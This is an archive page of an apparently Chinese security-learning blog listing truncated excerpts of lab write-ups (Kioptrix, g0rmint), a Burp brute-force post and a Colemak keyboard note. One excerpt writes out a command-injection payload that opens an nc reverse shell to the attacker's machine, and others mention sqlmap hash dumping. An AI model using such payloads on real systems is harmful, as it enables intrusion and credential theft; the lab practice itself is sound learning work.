InfoSec learning 
  • Home
  • Archives
  • Categories
  • Tags
  •   
root@whale3070:~# _

g0rmint(一句话写入log)

登陆以后,发现功能少的可怜。。 ::: {.image-package}{.uploaded-imgwidth=”auto” height=”auto”}\ ::: {.image-caption}:::::: 主面板显示:under contructin,正在施工。。 secrets不知道是什么,好像不是英语,乱码? profile是个更改登录密码功能,logout就不说了。 那么,该如何提权呢

2017-11-02
training

g0rmint

靶机地址 一:侦察1.开80、22端口。 2.访问http://192.168.1.116,显示 The requested URL / was not found on this server. 我的第一反应是80端口扫描错了,要不重新扫描一遍? .…呃,其实是网站没有配置好吧,然后扫描网站文件路径。 信息:Apache/2.4.18 (Ubuntu) Server 路径:http://1

2017-11-02
training

kioptrix

::: {.container}::: {.post}::: {.show-content}奇特的是,nmap完全没有探测到主机开放的痕迹,换了几个参数,扫来扫去都没有发现。。。 是不是配置错误,没有联网,可是桥接没错啊。 netdiscover -r 192.168.1.0/24 ::: {.image-package}{.uploaded-imgwidth=”auto” height=”aut

2017-11-02
training

colemak键盘布局

官网https://colemak.com/FAQ\ 相关链接 http://zhangshenjia.com/it/qwerty-dvorak-colemak/ Colemak是什么?\ /'ko:lmæk/ (Coal-Mac),是一种为了英语盲打设计(译注:其实也能提高中文拼音)的键盘布局方案。它是QWERTY键盘和Dvorak的一种使用替代方案。2006年1月1日发布。 为

2017-11-01
tools

kioptrix-level-2(命令执行漏洞)

kioptrix :192.168.1.117         kali linux :192.168.1.111            上一篇 --  参考 开放端口:22(ssh),80(http),111(rpcbind),443(https),616(sco-sysmgr),631(ipp),3306(mysql) 后续探测:use scanner/ssh/ssh_version (me

2017-11-01
training

level-2-(nc与内核漏洞提权)

续上篇  192.168.1.1;/usr/local/bin/nc 攻击机ip 6666 -e /bin/sh ::: {.image-package}\ ::: {.image-caption}:::::: 于是获得了 sh类型的shell 攻击机输入下面命令,目的是监听666端口,如果有主机连上它,就发送hole.c ::: {.image-package}\ ::: {.image-c

2017-11-01
training

level-3-下集(wget与提权)

sqlmap获取数据库用户密码的hash值。参考 获得信息用户名:dreg              hash值:0d3eccfb887aabd50f243b3f155c0f85    解密后:Mast3r 用户名:loneferret      hash值:5badcaf789d3d1d09794d8f021f40f0e   解密后:starwars  sqlmap -u "kio

2017-11-01
training

level-4-布尔盲注

::: {.container}::: {.post}::: {.show-content}(下载地址见以前的文章)该虚拟机下载下来后只有一个vmdk文件,要创建一个新建一个虚拟机才能使用,方法详情 按例扫描IP和端口,信息搜集如下: 192.168.1.107 22(ssh)、80(http)、139(Samba)、445 22端口版本  OpenSSH 4.7p1    80端口      

2017-10-31
training

kiotrix靶机(139端口samba)

靶机下载地址  攻击机kali linux:192.168.1.111  靶机kiotrix level 1linux:192.168.1.104 unicornscan -mT -r500 -I 192.168.1.104 unicornscan -mU -r500 -I 192.168.1.104 先扫所有TCP端口、再扫UDP端口。 -mT 默认tcp扫描 -r500 每秒发送500个数据

2017-10-01
training

Burp暴力破解

::: {.container}::: {.post}::: {.show-content}参考:http://www.freebuf.com/sectool/3693.html  (网上教程很多,我就不重复造轮子了) 最近又有一个比赛,信息安全铁人三项赛,第二场web方向的,拿到出题方给的5.2G题目后,在本机虚拟机开始实验。 ::: {.image-package}\ ::: {.image-

2017-03-27
ctf
1…9192939495…100

Search

Whale3070
总访问量 次 总访客数 人